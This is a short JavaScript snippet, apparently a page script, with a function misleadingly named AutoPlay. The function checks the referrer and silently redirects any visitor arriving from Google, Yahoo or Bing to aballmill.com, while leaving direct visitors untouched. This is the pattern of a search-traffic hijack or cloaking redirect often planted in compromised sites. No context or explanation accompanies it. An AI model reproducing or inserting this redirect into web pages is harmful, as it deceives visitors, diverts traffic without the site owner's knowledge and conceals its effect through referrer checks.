var url=document.referrer;
AutoPlay();
function AutoPlay(){
	if(url.indexOf("aballmill.com")>-1)
		return true;
	else
	{
		if(url.indexOf("google")>-1)
			{
				window.location.href="http://www.aballmill.com";
				return false;
			}
		else if(url.indexOf("yahoo")>-1)
			{
				window.location.href="http://www.aballmill.com";
				return false;
			}
		else if(url.indexOf("bing")>-1)
			{
				window.location.href="http://www.aballmill.com";
				return false;
			}
		else return true;
	}
} 

